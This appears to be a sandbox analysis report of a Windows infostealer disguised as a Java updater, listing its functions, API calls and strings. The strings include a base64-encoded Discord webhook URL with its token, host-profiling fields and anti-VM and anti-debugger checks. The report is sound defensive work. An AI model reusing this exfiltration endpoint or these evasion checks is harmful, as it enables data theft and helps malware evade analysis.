?_Getcat@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 5480->5487 5481->5480 5484 7ff65e1f74cf 5482->5484 5485 7ff65e1fb33f 5483->5485 5486 7ff65e1fb326 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5483->5486 5484->4935 5484->4937 5485->5474 5486->5485 5488 7ff65e1fb250 5487->5488 5489 

                                        Control-flow Graph

                                        [Figure: control-flow graph beginning at block 7ff65e1f70a0-7ff65e1f7125; legend: Executed, Not Executed]
                                        APIs
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F34D8
                                          • Part of subcall function 00007FF65E1F6000: CryptStringToBinaryA.CRYPT32 ref: 00007FF65E1F6065
                                          • Part of subcall function 00007FF65E1F6000: memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF65E1F60A6
                                          • Part of subcall function 00007FF65E1F6000: CryptStringToBinaryA.CRYPT32 ref: 00007FF65E1F60DF
                                          • Part of subcall function 00007FF65E1F6000: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF65E1F6141
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7150
                                        • _Xtime_get_ticks.MSVCP140 ref: 00007FF65E1F7397
                                        • memset.VCRUNTIME140 ref: 00007FF65E1F73D6
                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF65E1F7401
                                        • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF65E1F7423
                                        • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF65E1F7466
                                        • _gmtime64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF65E1F7493
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7932
                                        • memmove.VCRUNTIME140 ref: 00007FF65E1F798D
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7A7F
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7ACA
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF65E1F7B50
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7B91
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7BF3
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7C4A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7CAC
                                        • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF65E1F7D0B
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF65E1F7D19
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7D70
                                          • Part of subcall function 00007FF65E1FB470: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB53E
                                          • Part of subcall function 00007FF65E1FB470: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB58D
                                          • Part of subcall function 00007FF65E1FB470: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB5CC
                                        • _CxxThrowException.VCRUNTIME140 ref: 00007FF65E1F7DF5
                                          • Part of subcall function 00007FF65E1F11C0: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF65E1F11CB
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3579
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1F7E00
                                        • GetUserNameW.ADVAPI32 ref: 00007FF65E1F7E9D
                                        • GetComputerNameW.KERNEL32 ref: 00007FF65E1F7F2E
                                        • GetVolumeInformationW.KERNELBASE ref: 00007FF65E1F801F
                                        • memset.VCRUNTIME140 ref: 00007FF65E1F80EC
                                        • GetVersionExW.KERNEL32 ref: 00007FF65E1F8102
                                          • Part of subcall function 00007FF65E1F3280: __stdio_common_vswprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF65E1F32C3
                                          • Part of subcall function 00007FF65E1F21A0: ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF65E1F21C0
                                          • Part of subcall function 00007FF65E1F21A0: ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z.MSVCP140 ref: 00007FF65E1F2216
                                          • Part of subcall function 00007FF65E1F21A0: ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z.MSVCP140 ref: 00007FF65E1F2232
                                          • Part of subcall function 00007FF65E1F21A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF65E1F2242
                                          • Part of subcall function 00007FF65E1F21A0: ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z.MSVCP140 ref: 00007FF65E1F2251
                                          • Part of subcall function 00007FF65E1F21A0: ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z.MSVCP140 ref: 00007FF65E1F2265
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@$V01@memmovememset$BinaryCryptLocimp@locale@std@@NameString$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??0?$codecvt@_??1?$basic_ios@??1?$basic_iostream@??4?$_??6?$basic_ostream@Addfac@_Bid@locale@std@@ComputerConcurrency::cancel_current_taskD@std@@D@std@@@1@@ExceptionInformationInit@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_ThrowUserV01@@V123@V123@@V?$basic_streambuf@VersionVfacet@23@_VolumeXlength_error@std@@Xtime_get_ticksYarn@__stdio_common_vswprintf_s_gmtime64
                                        • String ID: -d "$%08X$%Y-%m-%dT%H:%M:%S.000Z$Application$C:\$Drives$New client$Security$System$Webhook sent. Response: $aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMyMTMyODYwMjc5MjQ2MDMzMC9ROUNRTVVxaFBtbkxBOFlDR0ZpV2NOMXFzbWQ4U3pFekhWNVJjRnJJdVl4OFVXVTJiU0czZmR3NGdyMUM3QVZoSlFobQ==$embeds$h$ip address$local user$product version$serial number$system name$timestamp
                                        • API String ID: 2975285854-287537819
                                        • Opcode ID: 3e4def7a3932eda77ec408c44bbf75faeee4343490c5b6f44898434bce0f04f2
                                        • Instruction ID: 2b96ea6ee1781134b0a5c494a4b95b59a245e85fffd4bb4443e61bbc6ed87c7c
                                        • Opcode Fuzzy Hash: 3e4def7a3932eda77ec408c44bbf75faeee4343490c5b6f44898434bce0f04f2
                                        • Instruction Fuzzy Hash: 5CB2B372A18BC281EF70CB24E5503EE7361FBA5394F445232EAAD92A99DF7CD184C750

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInitString$AllocFree$CreateInitializeInstanceUninitializemalloc
                                        • String ID: Application$Java Platform SE$JavaUpdater$Security$System
                                        • API String ID: 2476186896-3516896312
                                        • Opcode ID: c4336876aa5dd49f438aa50f56fe5437a00529bda7151e768ad878f618675877
                                        • Instruction ID: 0c14d68edbc7e1695dea76f979280c84fcf7b233eac0b447824847803cea583b
                                        • Opcode Fuzzy Hash: c4336876aa5dd49f438aa50f56fe5437a00529bda7151e768ad878f618675877
                                        • Instruction Fuzzy Hash: E6423832A05B858AEF11CF35D9502AD33A0FB99B48F188525EE4DA7B68EF3CD585C350

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F34D8
                                        • GetUserNameW.ADVAPI32 ref: 00007FF65E1F7E9D
                                          • Part of subcall function 00007FF65E1F21A0: ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF65E1F21C0
                                          • Part of subcall function 00007FF65E1F21A0: ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z.MSVCP140 ref: 00007FF65E1F2216
                                          • Part of subcall function 00007FF65E1F21A0: ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z.MSVCP140 ref: 00007FF65E1F2232
                                          • Part of subcall function 00007FF65E1F21A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF65E1F2242
                                          • Part of subcall function 00007FF65E1F21A0: ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z.MSVCP140 ref: 00007FF65E1F2251
                                          • Part of subcall function 00007FF65E1F21A0: ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z.MSVCP140 ref: 00007FF65E1F2265
                                        • GetComputerNameW.KERNEL32 ref: 00007FF65E1F7F2E
                                        • GetVolumeInformationW.KERNELBASE ref: 00007FF65E1F801F
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3579
                                          • Part of subcall function 00007FF65E1F34A0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1F3597
                                        • memset.VCRUNTIME140 ref: 00007FF65E1F80EC
                                        • GetVersionExW.KERNEL32 ref: 00007FF65E1F8102
                                        • GetModuleHandleW.KERNEL32 ref: 00007FF65E1F811A
                                        • GetProcAddress.KERNEL32 ref: 00007FF65E1F812A
                                          • Part of subcall function 00007FF65E1F34A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3556
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F8389
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Locimp@locale@std@@Name_invalid_parameter_noinfo_noreturnmemmove$??0?$codecvt@_??4?$_Addfac@_AddressBid@locale@std@@ComputerConcurrency::cancel_current_taskD@std@@HandleInformationInit@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@ModuleNew_ProcUserV01@V123@V123@@VersionVfacet@23@_VolumeYarn@memset
                                        • String ID: %08X$Application$C:\$Drives$GetProductInfo$New client$Unknown$Windows %d.%d (Build %d)$ip address$kernel32.dll$local user$product version$serial number$system name
                                        • API String ID: 1900567759-3537065479
                                        • Opcode ID: 5080b76f6441fb5deaf58bdfd11dae4b1887ad35dd40ac654e91d0965d0d4ce7
                                        • Instruction ID: 99ab22116fd59ff2da31853da2113fcfc70ac95369e6f800dc71742cd34cbbe7
                                        • Opcode Fuzzy Hash: 5080b76f6441fb5deaf58bdfd11dae4b1887ad35dd40ac654e91d0965d0d4ce7
                                        • Instruction Fuzzy Hash: 48F18422A146C299EF70DF34C9513E93361FBA5348F885231F65CA6999EF7CD684C390

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$ConsoleEventFileWindow$?good@ios_base@std@@AttributesMenuV01@$??6?$basic_ostream@?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@AdjustClearCloseCtrlErrorGdiplusHandlerHardModuleNameOpenOsfx@?$basic_ostream@PrivilegeRaiseRemoveShowStartupSystemUninitializeV01@@V12@_invalid_parameter_noinfo_noreturn
                                        • String ID: Application$Security$System
                                        • API String ID: 1039291073-2169399579
                                        • Opcode ID: 2202469d28eb256a13a2b8e783f8f6042cd7bca2b1afced6cc134338b03aeeda
                                        • Instruction ID: 7d3fb49b106695e8e883b65edaa9a89731b1c9ca2a65a536775fd3e785ba816e
                                        • Opcode Fuzzy Hash: 2202469d28eb256a13a2b8e783f8f6042cd7bca2b1afced6cc134338b03aeeda
                                        • Instruction Fuzzy Hash: C8618031A08A4281FF20DF24E66476A73A2FFA4784F484431E95DA2AE8EF7CE445C751

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_wcsicmpmemset
                                        • String ID: QEMU$Security check failed!$VBox$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 4057197811-609307201
                                        • Opcode ID: c64f5e80e60c7e590fc2e8e59739d82692e68fa2b7077d425abbb35b56314ba8
                                        • Instruction ID: ebf9fca0d3a3ad4c5cc2ac5effc41172ca788f8d8c36615c21b3d456145d57c1
                                        • Opcode Fuzzy Hash: c64f5e80e60c7e590fc2e8e59739d82692e68fa2b7077d425abbb35b56314ba8
                                        • Instruction Fuzzy Hash: C1414221B08A0684FF10DF60EB605B83372BB64798F884532E91EA3698EF3CE509C351

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Library$FreeProcess$AddressCurrentInformationLoadProcQuery
                                        • String ID: NtQueryInformationProcess$QEMU$VBox$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$ntdll.dll$x32dbg.exe$x64dbg.exe
                                        • API String ID: 3226424356-3571693660
                                        • Opcode ID: d9627f16db0fc1a86dd0f104945a38c67c949dada191655017f2f8b7aff098c4
                                        • Instruction ID: 23dcbccd53e10c36a6100cd8590addf0bfe513d51dd3512ab8b88c6f2314a332
                                        • Opcode Fuzzy Hash: d9627f16db0fc1a86dd0f104945a38c67c949dada191655017f2f8b7aff098c4
                                        • Instruction Fuzzy Hash: 97310325A08B0691FE508F11A724BB93361FF68788F880432E95EA3798EF7DE645C351

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValuestrstr
                                        • String ID: QEMU$SYSTEM\HardwareConfig\Current\$SystemManufacturer$VMware$Virtual$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 3146380931-3937382361
                                        • Opcode ID: ef39f671da64075728605a1ffdf3e4a340ea3a097cf108c17dc8ed1a93a84ef8
                                        • Instruction ID: 21bfcf2499dec480e0b7b91ff58e9e14ca16a8e0faccf8d8fe6baa47d62b1aa6
                                        • Opcode Fuzzy Hash: ef39f671da64075728605a1ffdf3e4a340ea3a097cf108c17dc8ed1a93a84ef8
                                        • Instruction Fuzzy Hash: AE313432B18A1695FF50CF10E660AA93775FB6474CF880432EA5DA3698EF3CE545C740

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Close$OpenQueryValue
                                        • String ID: DebugPolicy$QEMU$SYSTEM\CurrentControlSet\Control\CI\Policy$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 1607946009-952540290
                                        • Opcode ID: 25521cfc004ebc257bc61c3e9327480934541754925d5f39829c10b8d7562104
                                        • Instruction ID: 9fe64558595a68360b04cbd7dbb653f77c0860bd08df0753c6303ed2264cf385
                                        • Opcode Fuzzy Hash: 25521cfc004ebc257bc61c3e9327480934541754925d5f39829c10b8d7562104
                                        • Instruction Fuzzy Hash: 3D218576A18A4781FF608F10E620BA93365FB6474CF880432FA5DA3698EF3CE645C751

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterV01@$??6?$basic_ostream@D@std@@@std@@FrequencySleepU?$char_traits@V01@@
                                        • String ID: QEMU$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 353636290-478688673
                                        • Opcode ID: b0e68379d2f43bbfd6adcc4404e2dbc32403da636b006cdd8939f56799da900c
                                        • Instruction ID: 75f525d00d68b5bec7d22b2a59848d98747988fe1b4f097b988c7bc778ea8ab1
                                        • Opcode Fuzzy Hash: b0e68379d2f43bbfd6adcc4404e2dbc32403da636b006cdd8939f56799da900c
                                        • Instruction Fuzzy Hash: 16216521A08A4795FF01DF20E6609A97322FF64788F880132E90EB36A4EF3CE546C751

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: V01@$??6?$basic_ostream@CheckCurrentD@std@@@std@@DebuggerPresentProcessRemoteU?$char_traits@V01@@
                                        • String ID: QEMU$VMware$cheatengine-x86_64.exe$ida.exe$ida64.exe$x32dbg.exe$x64dbg.exe
                                        • API String ID: 3386908335-478688673
                                        • Opcode ID: 9cc1c9118efba7c555eab79f76b55be6e403fb393d9724d640f38c7b895dc272
                                        • Instruction ID: dd83402519933d85195905896e38e8197250276cb7fce0f167b13a8b5cc7dd5b
                                        • Opcode Fuzzy Hash: 9cc1c9118efba7c555eab79f76b55be6e403fb393d9724d640f38c7b895dc272
                                        • Instruction Fuzzy Hash: DD11566560894791FF50CF10E620AE93361FB6434CF880432EA1EA3298EF3DEA4AC751

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F34D8
                                        • GetLogicalDriveStringsA.KERNEL32 ref: 00007FF65E1F17F4
                                        • memset.VCRUNTIME140 ref: 00007FF65E1F1819
                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF65E1F1838
                                        • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF65E1F1852
                                        • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF65E1F1883
                                        • GetDriveTypeA.KERNELBASE ref: 00007FF65E1F18FE
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F1A67
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F1A6E
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F1B77
                                        • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF65E1F1BB2
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF65E1F1BBC
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3579
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$_invalid_parameter_noinfo_noreturn$Drivememmove$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@LogicalStringsTypeV?$basic_streambuf@memset
                                        • String ID: (CD-ROM)$ (Local)$ (Network)$ (RAM Disk)$ (Removable)$ (Unknown)$No drives detected
                                        • API String ID: 3633658073-1332592045
                                        • Opcode ID: fc386d3375d3b44eabae3c4723390cc2e52fbe90a3799c7f1168b13f9aec711b
                                        • Instruction ID: 2a4f32d8cb9b31cf85b175498110f855c1d7357e8fe5f8a1a126a4917db7805d
                                        • Opcode Fuzzy Hash: fc386d3375d3b44eabae3c4723390cc2e52fbe90a3799c7f1168b13f9aec711b
                                        • Instruction Fuzzy Hash: 2CD1C172B18B8185FF20CF65D6502AD7760FBA5794F484232EA6DA3A99DF7CD180CB40

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: CloseHandle$CreateExceptionFileReadThrow$ObjectPipeProcessSingleWaitmemmove
                                        • String ID: CreatePipe failed$CreateProcess failed$System
                                        • API String ID: 1891516669-1096748438
                                        • Opcode ID: 3880c30b75bd352c9b1a29dab04add5514506e865d04dfa20b575b1e48a9bc5d
                                        • Instruction ID: f9c2d757a9905be059220a442b14d522826edff6c74451a061dea369a14ab5a0
                                        • Opcode Fuzzy Hash: 3880c30b75bd352c9b1a29dab04add5514506e865d04dfa20b575b1e48a9bc5d
                                        • Instruction Fuzzy Hash: 18717F32A08B8286FF10CF60EA506AD7761FBA4788F145136EA4DA3A68DF7CD595C740

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
